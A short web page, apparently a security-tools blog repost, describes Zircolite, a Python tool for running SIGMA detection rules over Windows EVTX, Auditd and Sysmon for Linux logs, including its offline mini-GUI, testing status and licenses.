Zircolite – A Standalone SIGMA-based Detection Tool For EVTX, Auditd And Sysmon For Linux Logs
Standalone SIGMA-based detection tool for EVTX, Auditd, Sysmon for linux or JSONL/NDJSON Logs
Zircolite is a standalone tool written in Python 3. It allows to use SIGMA rules on MS Windows EVTX (EVTX and JSONL format), Auditd logs and Sysmon for Linux logs
- Zircolite can be used directly on the investigated endpoint (use
The Mini-GUI can be used totally offline, it allows the user to display and search results. To know how to use the Mini-GUI, check docs here.
Battle-tested
Zircolite has been used to perform cold-analysis (in Lab) on EVTX in multiple “real-life” situations. However, even if Zircolite has been used many times to perform analysis directly on a Microsoft Windows endpoint, there is not yet a pipeline to thoroughly test every release.
License
- All the code of the project is licensed under the GNU Lesser General Public License
evtx_dump
is under the MIT license- The rules are released under the Detection Rule License (DRL) 1.0
Download Zircolite
If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.